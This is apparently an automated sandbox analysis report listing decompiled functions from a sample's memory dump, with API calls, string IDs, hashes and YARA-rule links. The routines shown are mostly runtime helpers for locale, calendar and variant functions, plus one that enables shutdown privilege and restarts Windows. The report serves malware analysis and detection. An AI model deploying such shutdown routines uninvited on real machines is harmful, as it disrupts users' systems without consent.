                                                                    • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                    • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                    • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                    • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                    0x004af11b
                                                                    0x004af178
                                                                    0x004af17c
                                                                    0x004af184
                                                                    0x00000000
                                                                    0x004af186
                                                                    0x004af12d
                                                                    0x004af13f
                                                                    0x004af144
                                                                    0x004af14c
                                                                    0x004af166
                                                                    0x004af172
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af174
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 107509674-3733053543
                                                                    • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                    • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                    • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                    • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                                    0x00427882
                                                                    0x00427896
                                                                    0x004278ac
                                                                    0x004278c2
                                                                    0x004278d8
                                                                    0x004278ee
                                                                    0x00427904
                                                                    0x0042791a
                                                                    0x00427930
                                                                    0x00427946
                                                                    0x0042795c
                                                                    0x00427972
                                                                    0x00427988
                                                                    0x0042799e
                                                                    0x004279b4
                                                                    0x004279ca
                                                                    0x004279e0
                                                                    0x004279f6
                                                                    0x00427a0c
                                                                    0x00427a22
                                                                    0x00427a38
                                                                    0x00427a4e
                                                                    0x00427a5e
                                                                    0x00427a64
                                                                    0x00427a6b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                      • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                    • API String ID: 1646373207-1918263038
                                                                    • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                    • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                    • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                    • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                                    0x0041e7cc
                                                                    0x0041e7cc
                                                                    0x0041e7cc
                                                                    0x0041e7cd
                                                                    0x0041e7cf
                                                                    0x0041e7d4
                                                                    0x0041e7d7
                                                                    0x0041e7da
                                                                    0x0041e7dd
                                                                    0x0041e7e1
                                                                    0x0041e7e2
                                                                    0x0041e7e7
                                                                    0x0041e7ea
                                                                    0x0041e7ed
                                                                    0x0041e7f2
                                                                    0x0041e7f5
                                                                    0x0041e7f9
                                                                    0x0041e7f9
                                                                    0x0041e80b
                                                                    0x0041e812
                                                                    0x0041e813
                                                                    0x0041e818
                                                                    0x0041e81b
                                                                    0x0041e820
                                                                    0x0041e826
                                                                    0x0041e837
                                                                    0x0041e83c
                                                                    0x0041e84f
                                                                    0x0041e861
                                                                    0x0041e86b
                                                                    0x0041e8c8
                                                                    0x0041e8cb
                                                                    0x0041e8d6
                                                                    0x0041e8dc
                                                                    0x0041e8ed
                                                                    0x0041e8f2
                                                                    0x0041e8ff
                                                                    0x0041e90b
                                                                    0x0041e90e
                                                                    0x0041e913
                                                                    0x0041e91a
                                                                    0x0041e92d
                                                                    0x0041e937
                                                                    0x0041e93a
                                                                    0x0041e93d
                                                                    0x0041e945
                                                                    0x0041e948
                                                                    0x0041e957
                                                                    0x0041e95c
                                                                    0x0041e961
                                                                    0x0041e963
                                                                    0x0041e965
                                                                    0x0041e965
                                                                    0x0041e968
                                                                    0x0041e968
                                                                    0x0041e96c
                                                                    0x0041e96d
                                                                    0x0041e96f
                                                                    0x0041e971
                                                                    0x0041e976
                                                                    0x0041e97f
                                                                    0x0041e987
                                                                    0x0041e988
                                                                    0x0041e988
                                                                    0x0041e988
                                                                    0x0041e976
                                                                    0x0041e999
                                                                    0x0041e999
                                                                    0x0041e86d
                                                                    0x0041e87b
                                                                    0x0041e880
                                                                    0x0041e887
                                                                    0x0041e88c
                                                                    0x0041e88c
                                                                    0x0041e890
                                                                    0x0041e893
                                                                    0x0041e895
                                                                    0x0041e896
                                                                    0x0041e898
                                                                    0x0041e8a1
                                                                    0x0041e8a9
                                                                    0x0041e8aa
                                                                    0x0041e8aa
                                                                    0x0041e898
                                                                    0x0041e8bb
                                                                    0x0041e8bb
                                                                    0x0041e9a3
                                                                    0x0041e9a7
                                                                    0x0041e9ac
                                                                    0x0041e9ac
                                                                    0x0041e9ae
                                                                    0x0041e9c2
                                                                    0x0041e9ca
                                                                    0x0041e9d1
                                                                    0x0041e9d6
                                                                    0x0041e9d6
                                                                    0x0041e9da
                                                                    0x0041e9dd
                                                                    0x0041e9df
                                                                    0x0041e9e0
                                                                    0x0041e9e2
                                                                    0x0041e9e2
                                                                    0x0041e9fa
                                                                    0x0041ea00
                                                                    0x0041ea05
                                                                    0x0041ea06
                                                                    0x0041ea06
                                                                    0x0041e9e2
                                                                    0x0041ea0e
                                                                    0x0041ea14
                                                                    0x0041ea19
                                                                    0x0041ea20
                                                                    0x0041ea25
                                                                    0x0041ea25
                                                                    0x0041ea27
                                                                    0x0041ea2e
                                                                    0x0041ea30
                                                                    0x0041ea31
                                                                    0x0041ea34
                                                                    0x0041ea43

                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CalendarEnumInfoLocaleThread
                                                                    • String ID: B.C.$ToA$K$K$K
                                                                    • API String ID: 683597275-1724967715
                                                                    • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                    • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                    • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                    • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                                    0x0040a255
                                                                    0x0040a25a
                                                                    0x0040a268
                                                                    0x0040a270
                                                                    0x0040a27e
                                                                    0x0040a295
                                                                    0x0040a2af
                                                                    0x0040a2c4
                                                                    0x0040a2c9
                                                                    0x00000000
                                                                    0x0040a2c9
                                                                    0x0040a2ce

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                    • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                    • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                    • API String ID: 74573329-1403180336
                                                                    • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                    • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                    • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                    • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                                    0x0041e0ac
                                                                    0x0041e0ac
                                                                    0x0041e0ad
                                                                    0x0041e0af
                                                                    0x0041e0b4
                                                                    0x0041e0b4
                                                                    0x0041e0b6
                                                                    0x0041e0b8
                                                                    0x0041e0b8
                                                                    0x0041e0bd
                                                                    0x0041e0be
                                                                    0x0041e0c0
                                                                    0x0041e0c4
                                                                    0x0041e0c5
                                                                    0x0041e0ca
                                                                    0x0041e0cd
                                                                    0x0041e0d3
                                                                    0x0041e0d8
                                                                    0x0041e0da
                                                                    0x0041e0e1
                                                                    0x0041e0e1
                                                                    0x0041e0e9
                                                                    0x0041e0ef
                                                                    0x0041e0f8
                                                                    0x0041e101
                                                                    0x0041e10a
                                                                    0x0041e11c
                                                                    0x0041e126
                                                                    0x0041e13b
                                                                    0x0041e14a
                                                                    0x0041e15d
                                                                    0x0041e16c
                                                                    0x0041e182
                                                                    0x0041e199
                                                                    0x0041e1b0
                                                                    0x0041e1bf
                                                                    0x0041e1d2
                                                                    0x0041e1d4
                                                                    0x0041e1d8
                                                                    0x0041e1e9
                                                                    0x0041e1f4
                                                                    0x0041e1fd
                                                                    0x0041e20e
                                                                    0x0041e219
                                                                    0x0041e22e
                                                                    0x0041e242
                                                                    0x0041e24d
                                                                    0x0041e262
                                                                    0x0041e26d
                                                                    0x0041e275
                                                                    0x0041e27d
                                                                    0x0041e292
                                                                    0x0041e29c
                                                                    0x0041e2a1
                                                                    0x0041e2a3
                                                                    0x0041e2bc
                                                                    0x0041e2a5
                                                                    0x0041e2ad
                                                                    0x0041e2ad
                                                                    0x0041e2d1
                                                                    0x0041e2db
                                                                    0x0041e2e0
                                                                    0x0041e2e2
                                                                    0x0041e2f4
                                                                    0x0041e305
                                                                    0x0041e31e
                                                                    0x0041e307
                                                                    0x0041e30f
                                                                    0x0041e30f
                                                                    0x0041e305
                                                                    0x0041e323
                                                                    0x0041e326
                                                                    0x0041e329
                                                                    0x0041e32e
                                                                    0x0041e339
                                                                    0x0041e33e
                                                                    0x0041e341
                                                                    0x0041e344
                                                                    0x0041e349
                                                                    0x0041e354
                                                                    0x0041e369
                                                                    0x0041e36d
                                                                    0x0041e378
                                                                    0x0041e37b
                                                                    0x0041e37e
                                                                    0x0041e390

                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                    • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                      • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                      • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Locale$Info$ThreadValid
                                                                    • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                    • API String ID: 233154393-2808312488
